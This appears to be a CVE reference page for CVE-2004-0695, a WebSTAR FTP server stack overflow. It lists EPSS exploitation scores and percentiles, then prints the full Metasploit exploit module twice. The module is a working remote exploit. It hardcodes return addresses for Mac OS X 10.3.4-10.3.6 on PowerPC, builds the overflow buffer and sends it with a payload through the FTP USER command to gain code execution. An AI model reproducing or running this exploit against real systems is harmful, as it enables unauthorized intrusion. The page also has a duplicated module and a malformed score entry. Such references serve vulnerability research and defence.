CVE-2004-0695 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	74.39%	–	–
2023-03-12	–	–	–	95.94%	–
2023-06-25	–	–	–	87.71%	–
2024-02-11	–	–	–	87.71%	–
2024-06-02	–	–	–	87.71%	–
2024-12-22	–	–	–	73.84%	–
2025-01-19	–	–	–	73.84%	–
2025-03-18	–	–	–	–	79.12%
2025-03-18	–	–	–	–	79.12,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	99%
2023-06-25	98%
2024-02-11	99%
2024-06-02	99%
2024-12-22	98%
2025-01-19	98%
2025-03-18	99%
2025-03-18	99%

## # $Id: webstar_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'WebSTAR FTP Server USER Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the logging routine of the WebSTAR FTP server. Reliable code execution is obtained by a series of hops through the System library. }, 'Author' => [ 'ddz', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2004-0695'], [ 'OSVDB', '7794'], [ 'BID', '10720'], ], 'Privileged' => true, 'Payload' => { 'Space' => 300, 'BadChars' => "\x00\x20\x0a\x0d", 'Compat' => { 'ConnectionType' => "+find" }, }, 'Targets' => [ [ 'Mac OS X 10.3.4-10.3.6', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Rets' => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ], }, ], ], 'DisclosureDate' => 'Jul 13 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]), ], self) end # crazy dino 5-hop foo #$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120 #$r28 = pack('N', 0x90034d60); # getgid() #$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30 #$r30 = pack('N', 0x90023590); # call $r3 def exploit connect # The offset to the return address is dependent on the length of our hostname # as the target system resolves it ( IP or reverse DNS ). mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST']) basel = 285 - mhost.length print_status("Trying target #{target.name}...") # ret = 296 # r25 = 260 # r26 = 264 # r27 = 268 # r28 = 272 # r29 = 276 # r30 = 280 # r31 = 284 # r1+120 = 408 buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars) buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120 buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid() buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30 buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3 buf << payload.encoded send_cmd( ['USER', buf] , true ) send_cmd( ['HELP'] , true ) handler disconnect end end

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'WebSTAR FTP Server USER Overflow', 'Description' => %q{ This module exploits a stack overflow in the logging routine of the WebSTAR FTP server. Reliable code execution is obtained by a series of hops through the System library. }, 'Author' => [ 'ddz', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0695'], [ 'OSVDB', '7794'], [ 'BID', '10720'], ], 'Privileged' => true, 'Payload' => { 'Space' => 300, 'BadChars' => "\x00\x20\x0a\x0d", 'Compat' => { 'ConnectionType' => "+find" }, }, 'Targets' => [ [ 'Mac OS X 10.3.4-10.3.6', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Rets' => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ], }, ], ], 'DisclosureDate' => 'Jul 13 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]), ], self) end # crazy dino 5-hop foo #$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120 #$r28 = pack('N', 0x90034d60); # getgid() #$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30 #$r30 = pack('N', 0x90023590); # call $r3 def exploit connect # The offset to the return address is dependent on the length of our hostname # as the target system resolves it ( IP or reverse DNS ). mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST']) basel = 285 - mhost.length print_status("Trying target #{target.name}...") # ret = 296 # r25 = 260 # r26 = 264 # r27 = 268 # r28 = 272 # r29 = 276 # r30 = 280 # r31 = 284 # r1+120 = 408 buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars) buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120 buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid() buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30 buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3 buf << payload.encoded send_cmd( ['USER', buf] , true ) send_cmd( ['HELP'] , true ) handler disconnect end end